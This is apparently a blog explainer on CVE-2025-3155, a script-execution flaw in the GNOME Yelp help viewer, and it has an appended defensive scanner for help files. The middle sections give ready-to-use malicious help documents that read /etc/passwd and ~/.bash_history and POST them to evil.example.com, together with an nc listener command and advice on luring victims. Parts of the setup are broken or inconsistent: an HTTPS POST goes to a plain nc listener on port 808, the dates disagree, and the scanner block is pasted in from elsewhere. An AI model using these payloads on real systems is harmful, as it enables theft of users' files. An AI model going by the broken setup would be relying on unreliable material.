On March 18th, 2025, a critical vulnerability surfaced in the GNOME Yelp user help application (official CVE listing), affecting millions of Linux users worldwide. This flaw, CVE-2025-3155, lets attackers craft evil help documents that run arbitrary scripts – and potentially steal your personal files. This long-read will walk you through what happened, why it matters, and how you can see it in action.
What is GNOME Yelp?
Yelp is the default help viewer for the GNOME desktop. Whenever you search “how to do X” in Ubuntu or Fedora, Yelp pops up and loads user guides in HTML. Under the hood, it renders help documents much like a web browser.
The Vulnerability
Yelp is supposed to be safe, opening only trusted local help files. But CVE-2025-3155 exposes a flaw: it allows *arbitrary scripts* embedded in help documents to run. In other words, a malicious .xml, .html or .yelp file can include executable code, such as JavaScript or even terminal commands.
> Why is this bad?
Because an attacker can convince you to open a booby-trapped help file (for example, via email or drive-by-download), and it will quietly run their code—like uploading your files to a remote server.
1. Crafting a Malicious Help File
Yelp help documents are often in Mallard XML or HTML. If unsafely rendered, they can contain JavaScript or shell-script calls.
A basic *malicious help document* could look like this:

```html
<!-- save as evil-help.html -->
<html>
<head>
  <title>Totally Harmless Help</title>
  <script>
    // Try to read user's /etc/passwd and send to remote attacker
    fetch('file:///etc/passwd')
      .then(r => r.text())
      .then(data => {
        fetch('https://evil.example.com/steal', {
          method: 'POST',
          body: data
        });
      });
  </script>
</head>
<body>
  <h1>Getting Started</h1>
  <p>Just a help file...</p>
</body>
</html>
```
2. Luring the Victim
The attacker sends you this evil-help.html (or similarly an evil-help.page in XML format) via email, forum, or chat. They may suggest, "Open this in Yelp to troubleshoot your GNOME settings!"
3. File Stealing in Action
When you open the file in Yelp (yelp evil-help.html), the JavaScript runs silently. Yelp does not block it. The script reads sensitive files and sends them to the attacker's server.
Proof-of-concept video:
*(You will find public demos once disclosed on exploit-db.com or YouTube).*
1. Make the malicious file
```xml
<?xml version="1.0" encoding="utf-8"?>
<!-- evil.page -->
<page xmlns="http://projectmallard.org/1.0/">
  <info>
    <title>Evil Yelp Exploit</title>
  </info>
  <p>Loading help...</p>
  <script type="text/javascript">
    fetch('file:///home/YOURUSERNAME/.bash_history')
      .then(r => r.text())
      .then(data => fetch('https://evil.example.com/steal', {method:'POST',body:data}));
  </script>
</page>
```
2. Start a listener on the attacker's server
```bash
# On attacker server
nc -l -p 808
```
3. Victim opens the file
```bash
yelp evil.page
```
Result: The victim’s .bash_history file is sent out undetected.
Fix & Mitigation
GNOME patched this in Yelp 42.4. Yelp now disables all script execution from help documents.
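A pre-open triage check for help files from untrusted sources, added here as an example (not code from the original article or from the Yelp project): it parses an HTML or Mallard document and reports script elements, inline event handlers, and `file://` or `http(s)://` URLs inside script bodies. The class and function names and the sample document are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
LOCAL_URI = re.compile(r"file://[^\s'\"<>)]+", re.I)
REMOTE_URI = re.compile(r"https?://[^\s'\"<>)]+", re.I)

class HelpDocScanner(HTMLParser):  # collects (line, kind, detail) findings
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        line = self.getpos()[0]
        if tag.rsplit(":", 1)[-1] == "script":  # also matches a prefixed html:script
            self._in_script = True
            self.findings.append((line, "script-element", tag))
        for name, _value in attrs:
            if name.startswith("on"):  # inline handlers such as onload=
                self.findings.append((line, "event-handler", name))

    def handle_endtag(self, tag):
        if tag.rsplit(":", 1)[-1] == "script":
            self._in_script = False

    def handle_data(self, data):
        if not self._in_script:
            return
        base = self.getpos()[0]  # line on which this run of script text starts
        for kind, rx in (("local-file-read", LOCAL_URI), ("remote-endpoint", REMOTE_URI)):
            for m in rx.finditer(data):
                line = base + data.count("\n", 0, m.start())
                self.findings.append((line, kind, m.group()))

def scan_help_doc(text):
    scanner = HelpDocScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings

# Constructed sample modelled on the evil.page example above; USER is a placeholder.
SAMPLE = """<page xmlns="http://projectmallard.org/1.0/">
<script type="text/javascript">
fetch('file:///home/USER/.bash_history')
  .then(r => r.text())
  .then(d => fetch('https://evil.example.com/steal', {method: 'POST', body: d}));
</script>
</page>"""
if __name__ == "__main__":
    print(*scan_help_doc(SAMPLE), sep="\n")
```

A finding means the file should not be opened in an unpatched Yelp; an empty result is not proof that a file is safe.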
Summary
CVE-2025-3155 is a classic “arbitrary script execution” flaw, showing how even simple desktop helpers like Yelp can be a risk if they don’t sanitize file inputs. If you use GNOME, update Yelp now, and never trust random help files again!
Timeline
Published on: 04/03/2025 14:15:46 UTC
Last modified on: 05/06/2025 13:15:51 UTC